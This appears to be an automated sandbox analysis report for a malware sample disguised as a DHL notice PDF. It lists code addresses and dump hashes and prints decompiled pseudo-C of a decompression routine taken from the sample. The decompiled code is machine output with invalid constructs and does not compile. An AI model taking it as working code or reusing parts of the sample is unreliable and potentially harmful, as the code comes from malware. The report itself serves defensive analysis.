                                                            0x00000000
                                                            0x004070b5
                                                            0x004070b9
                                                            0x00000000
                                                            0x00000000
                                                            0x004070bf
                                                            0x004070c1
                                                            0x004070c5
                                                            0x004070c5
                                                            0x004070c8
                                                            0x004070cc
                                                            0x00000000
                                                            0x00000000
                                                            0x0040711c
                                                            0x00407120
                                                            0x00407127
                                                            0x0040712a
                                                            0x0040712d
                                                            0x00407137
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00407122
                                                            0x00000000
                                                            0x00000000
                                                            0x00407143
                                                            0x00407147
                                                            0x0040714e
                                                            0x00407151
                                                            0x00407154
                                                            0x00407149
                                                            0x00407149
                                                            0x00407149
                                                            0x00407157
                                                            0x0040715a
                                                            0x0040715d
                                                            0x0040715d
                                                            0x00407160
                                                            0x00407163
                                                            0x00407166
                                                            0x00407166
                                                            0x00407169
                                                            0x00407170
                                                            0x00407175
                                                            0x00000000
                                                            0x00000000
                                                            0x00407203
                                                            0x00407203
                                                            0x00407207
                                                            0x004075a5
                                                            0x00000000
                                                            0x004075a5
                                                            0x0040720d
                                                            0x00407210
                                                            0x00407213
                                                            0x00407217
                                                            0x0040721a
                                                            0x00407220
                                                            0x00407222
                                                            0x00407222
                                                            0x00407222
                                                            0x00407225
                                                            0x00407228
                                                            0x00000000
                                                            0x00000000
                                                            0x00406df8
                                                            0x00406df8
                                                            0x00406dfc
                                                            0x00407569
                                                            0x00000000
                                                            0x00407569
                                                            0x00406e02
                                                            0x00406e05
                                                            0x00406e08
                                                            0x00406e0c
                                                            0x00406e0f
                                                            0x00406e15
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e17
                                                            0x00406e1a
                                                            0x00406e1d
                                                            0x00406e1d
                                                            0x00406e20
                                                            0x00406e23
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e29
                                                            0x00406e2f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406e35
                                                            0x00406e35
                                                            0x00406e39
                                                            0x00406e3c
                                                            0x00406e3f
                                                            0x00406e42
                                                            0x00406e45
                                                            0x00406e46
                                                            0x00406e49
                                                            0x00406e4b
                                                            0x00406e51
                                                            0x00406e54
                                                            0x00406e57
                                                            0x00406e5a
                                                            0x00406e5d
                                                            0x00406e60
                                                            0x00406e63
                                                            0x00406e7f
                                                            0x00406e82
                                                            0x00406e85
                                                            0x00406e88
                                                            0x00406e8f
                                                            0x00406e93
                                                            0x00406e95
                                                            0x00406e99
                                                            0x00406e65
                                                            0x00406e65
                                                            0x00406e69
                                                            0x00406e71
                                                            0x00406e76
                                                            0x00406e78
                                                            0x00406e7a
                                                            0x00406e7a
                                                            0x00406e9c
                                                            0x00406ea3
                                                            0x00406ea6
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eac
                                                            0x00000000
                                                            0x00406eb1
                                                            0x00406eb1
                                                            0x00406eb5
                                                            0x00407575
                                                            0x00000000
                                                            0x00407575
                                                            0x00406ebb
                                                            0x00406ebe
                                                            0x00406ec1
                                                            0x00406ec5
                                                            0x00406ec8
                                                            0x00406ece
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed0
                                                            0x00406ed3
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406ed6
                                                            0x00406edc
                                                            0x00000000
                                                            0x00000000
                                                            0x00406ede
                                                            0x00406ee1
                                                            0x00406ee4
                                                            0x00406ee7
                                                            0x00406eea
                                                            0x00406eed
                                                            0x00406ef0
                                                            0x00406ef3
                                                            0x00406ef6
                                                            0x00406ef9
                                                            0x00406efc
                                                            0x00406f14
                                                            0x00406f17
                                                            0x00406f1a
                                                            0x00406f1d
                                                            0x00406f1d
                                                            0x00406f20
                                                            0x00406f24
                                                            0x00406f26
                                                            0x00406efe
                                                            0x00406efe
                                                            0x00406f06
                                                            0x00406f0b
                                                            0x00406f0d
                                                            0x00406f0f
                                                            0x00406f0f
                                                            0x00406f29
                                                            0x00406f30
                                                            0x00406f33
                                                            0x00000000
                                                            0x00406f35
                                                            0x00000000
                                                            0x00406f35
                                                            0x00406f33
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00406f3a
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f75
                                                            0x00406f75
                                                            0x00406f79
                                                            0x00407581
                                                            0x00000000
                                                            0x00407581
                                                            0x00406f7f
                                                            0x00406f82
                                                            0x00406f85
                                                            0x00406f89
                                                            0x00406f8c
                                                            0x00406f92
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f94
                                                            0x00406f97
                                                            0x00406f9a
                                                            0x00406f9a
                                                            0x00406fa0
                                                            0x00406f3e
                                                            0x00406f3e
                                                            0x00406f41
                                                            0x00000000
                                                            0x00406f41
                                                            0x00406fa2
                                                            0x00406fa2
                                                            0x00406fa5
                                                            0x00406fa8
                                                            0x00406fab
                                                            0x00406fae
                                                            0x00406fb1
                                                            0x00406fb4
                                                            0x00406fb7
                                                            0x00406fba
                                                            0x00406fbd
                                                            0x00406fc0
                                                            0x00406fd8
                                                            0x00406fdb
                                                            0x00406fde
                                                            0x00406fe1
                                                            0x00406fe1
                                                            0x00406fe4
                                                            0x00406fe8
                                                            0x00406fea
                                                            0x00406fc2
                                                            0x00406fc2
                                                            0x00406fca
                                                            0x00406fcf
                                                            0x00406fd1
                                                            0x00406fd3
                                                            0x00406fd3
                                                            0x00406fed
                                                            0x00406ff4
                                                            0x00406ff7
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00406ff9
                                                            0x00000000
                                                            0x00407286
                                                            0x00407286
                                                            0x0040728a
                                                            0x004075b1
                                                            0x00000000
                                                            0x004075b1
                                                            0x00407290
                                                            0x00407293
                                                            0x00407296
                                                            0x0040729a
                                                            0x0040729d
                                                            0x004072a3
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a5
                                                            0x004072a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407056
                                                            0x00407056
                                                            0x00407059
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x00000000
                                                            0x00407395
                                                            0x00407399
                                                            0x004073bb
                                                            0x004073be
                                                            0x004073c8
                                                            0x004073cb
                                                            0x004073cb
                                                            0x004073cb
                                                            0x00000000
                                                            0x004073cb
                                                            0x004073cb
                                                            0x0040739b
                                                            0x0040739e
                                                            0x004073a2
                                                            0x004073a5
                                                            0x004073a5
                                                            0x004073a8
                                                            0x00000000
                                                            0x00000000
                                                            0x00407452
                                                            0x00407456
                                                            0x00407474
                                                            0x00407474
                                                            0x00407474
                                                            0x0040747b
                                                            0x00407482
                                                            0x00407489
                                                            0x00407489
                                                            0x00000000
                                                            0x00407489
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407546
                                                            0x00407447
                                                            0x00000000
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407194
                                                            0x00407197
                                                            0x0040719a
                                                            0x0040719c
                                                            0x0040719e
                                                            0x0040719e
                                                            0x0040719f
                                                            0x004071a2
                                                            0x004071a9
                                                            0x004071ac
                                                            0x004071ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040749f
                                                            0x0040749f
                                                            0x004074a3
                                                            0x004075db
                                                            0x00000000
                                                            0x004075db
                                                            0x004074a9
                                                            0x004074ac
                                                            0x004074af
                                                            0x004074b3
                                                            0x004074b6
                                                            0x004074bc
                                                            0x004074be
                                                            0x004074be
                                                            0x004074be
                                                            0x004074c1
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c4
                                                            0x004074c7
                                                            0x004074c7
                                                            0x004074cb
                                                            0x0040752b
                                                            0x0040752e
                                                            0x00407533
                                                            0x00407534
                                                            0x00407536
                                                            0x00407538
                                                            0x0040753b
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x0040744d
                                                            0x00407447
                                                            0x004074cd
                                                            0x004074d3
                                                            0x004074d6
                                                            0x004074d9
                                                            0x004074dc
                                                            0x004074df
                                                            0x004074e2
                                                            0x004074e5
                                                            0x004074e8
                                                            0x004074eb
                                                            0x004074ee
                                                            0x00407507
                                                            0x0040750a
                                                            0x0040750d
                                                            0x00407510
                                                            0x00407514
                                                            0x00407516
                                                            0x00407516
                                                            0x00407517
                                                            0x0040751a
                                                            0x004074f0
                                                            0x004074f0
                                                            0x004074f8
                                                            0x004074fd
                                                            0x004074ff
                                                            0x00407502
                                                            0x00407502
                                                            0x0040751d
                                                            0x00407524
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x00407526
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333
                                                            0x004075bd
                                                            0x00000000
                                                            0x004075bd
                                                            0x00407339
                                                            0x0040733c
                                                            0x00000000
                                                            0x00000000
                                                            0x00407342
                                                            0x00407346
                                                            0x00407349
                                                            0x00407349
                                                            0x00407349
                                                            0x00000000
                                                            0x00407349
                                                            0x004071c7
                                                            0x004071c9
                                                            0x004071cb
                                                            0x004071cd
                                                            0x004071d0
                                                            0x004071d1
                                                            0x004071d3
                                                            0x004071d5
                                                            0x004071d8
                                                            0x004071db
                                                            0x004071f1
                                                            0x004071f6
                                                            0x0040722e
                                                            0x0040722e
                                                            0x00407232
                                                            0x0040725e
                                                            0x00407260
                                                            0x00407267
                                                            0x0040726a
                                                            0x0040726d
                                                            0x0040726d
                                                            0x00407272
                                                            0x00407272
                                                            0x00407274
                                                            0x00407277
                                                            0x0040727e
                                                            0x00407281
                                                            0x004072ae
                                                            0x004072ae
                                                            0x004072b1
                                                            0x004072b4
                                                            0x00407328
                                                            0x00407328
                                                            0x00407328
                                                            0x00000000
                                                            0x00407328
                                                            0x004072b6
                                                            0x004072bc
                                                            0x004072bf
                                                            0x004072c2
                                                            0x004072c5
                                                            0x004072c8
                                                            0x004072cb
                                                            0x004072ce
                                                            0x004072d1
                                                            0x004072d4
                                                            0x004072d7
                                                            0x004072f0
                                                            0x004072f2
                                                            0x004072f5
                                                            0x004072f6
                                                            0x004072f9
                                                            0x004072fb
                                                            0x004072fe
                                                            0x00407300
                                                            0x00407302
                                                            0x00407305
                                                            0x00407307
                                                            0x0040730a
                                                            0x0040730e
                                                            0x00407310
                                                            0x00407310
                                                            0x00407311
                                                            0x00407314
                                                            0x00407317
                                                            0x004072d9
                                                            0x004072d9
                                                            0x004072e1
                                                            0x004072e6
                                                            0x004072e8
                                                            0x004072eb
                                                            0x004072eb
                                                            0x0040731a
                                                            0x00407321
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x004072ab
                                                            0x00000000
                                                            0x00407323
                                                            0x00000000
                                                            0x00407323
                                                            0x00407321
                                                            0x00407234
                                                            0x00407237
                                                            0x00407239
                                                            0x0040723c
                                                            0x0040723f
                                                            0x00407242
                                                            0x00407244
                                                            0x00407247
                                                            0x0040724a
                                                            0x0040724a
                                                            0x0040724d
                                                            0x0040724d
                                                            0x00407250
                                                            0x00407257
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x0040722b
                                                            0x00000000
                                                            0x00407259
                                                            0x00000000
                                                            0x00407259
                                                            0x00407257
                                                            0x004071dd
                                                            0x004071e0
                                                            0x004071e2
                                                            0x004071e5
                                                            0x00000000
                                                            0x00000000
                                                            0x00406f44
                                                            0x00406f44
                                                            0x00406f48
                                                            0x0040758d
                                                            0x00000000
                                                            0x0040758d
                                                            0x00406f4e
                                                            0x00406f51
                                                            0x00406f54
                                                            0x00406f57
                                                            0x00406f5a
                                                            0x00406f5d
                                                            0x00406f60
                                                            0x00406f62
                                                            0x00406f65
                                                            0x00406f68
                                                            0x00406f6b
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00406f6d
                                                            0x00000000
                                                            0x00000000
                                                            0x004070cf
                                                            0x004070cf
                                                            0x004070d3
                                                            0x00407599
                                                            0x00000000
                                                            0x00407599
                                                            0x004070d9
                                                            0x004070dc
                                                            0x004070df
                                                            0x004070e2
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e4
                                                            0x004070e7
                                                            0x004070ea
                                                            0x004070ed
                                                            0x004070f0
                                                            0x004070f3
                                                            0x004070f6
                                                            0x004070f7
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070f9
                                                            0x004070fc
                                                            0x004070ff
                                                            0x00407102
                                                            0x00407105
                                                            0x00407105
                                                            0x00407105
                                                            0x00407108
                                                            0x0040710a
                                                            0x0040710a
                                                            0x00000000
                                                            0x00000000
                                                            0x0040734c
                                                            0x0040734c
                                                            0x0040734c
                                                            0x00407350
                                                            0x00000000
                                                            0x00000000
                                                            0x00407356
                                                            0x00407359
                                                            0x0040735c
                                                            0x0040735f
                                                            0x00407361
                                                            0x00407361
                                                            0x00407361
                                                            0x00407364
                                                            0x00407367
                                                            0x0040736a
                                                            0x0040736d
                                                            0x00407370
                                                            0x00407373
                                                            0x00407374
                                                            0x00407376
                                                            0x00407376
                                                            0x00407376
                                                            0x00407379
                                                            0x0040737c
                                                            0x0040737f
                                                            0x00407382
                                                            0x00407385
                                                            0x00407389
                                                            0x0040738b
                                                            0x0040738e
                                                            0x00000000
                                                            0x00407390
                                                            0x0040710d
                                                            0x0040710d
                                                            0x00000000
                                                            0x0040710d
                                                            0x0040738e
                                                            0x004075c3
                                                            0x00000000
                                                            0x00000000
                                                            0x00406bf2
                                                            0x004075fa
                                                            0x004075fa
                                                            0x00000000
                                                            0x004075fa
                                                            0x00407447
                                                            0x004073ce
                                                            0x004073cb
                                                            0x00000000
                                                            0x00407002

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                            • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                            • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                            • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 98%
                                                            			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
